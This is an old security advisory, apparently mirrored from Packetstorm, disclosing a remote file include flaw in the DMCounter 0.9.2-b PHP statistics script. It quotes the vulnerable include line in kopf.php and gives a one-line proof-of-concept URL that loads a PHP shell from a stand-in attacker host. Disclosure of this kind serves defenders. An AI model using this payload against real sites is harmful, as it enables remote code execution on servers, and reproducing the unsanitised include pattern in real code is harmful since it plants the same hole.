Lucene search
K

DMCounter092b.txt

🗓️ 02 May 2006 00:00:00Reported by befordType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

PHP statistics software has a remote file include vulnerability allowing arbitrary code execution.

Code
`Script: DMCounter  
Version: 0.9.2-b  
Language: PHP  
Problem: Remote File Include  
Vendor: http://sourceforge.net/projects/dmcounter  
Discovered by: beford <xbefordx gmail com>  
  
Description  
=============  
Statistics software based on PHP which does not require any database  
support but just uses flat files. Daily + monthly visits, which pages, from  
where, browsers and OSs are listed and visually presented  
  
Problem  
=============  
A remote user can supply a specially crafted URL to cause the target  
system to include and execute arbitrary PHP code from a remote  
location. A remote user can execute arbitrary PHP code and operating  
system commands on the target system with the privileges of the  
target web service.  
  
The vulnerable file is kopf.php  
  
1 <?php  
2 $basepath=getcwd();  
3 include($rootdir.'/lang.php');  
  
$rootdir is not being declared before using it in the include() function.  
  
  
Proof of Concept URL  
==============  
http://victim.com/dmcounter/kopf.php?rootdir=http://attacker.com/phpshell.txt?  
  
Greets:  
==============  
][GB][  
Zetha - http://odiameporsernegro.org  
uyx  
fallen - x33x37.org  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation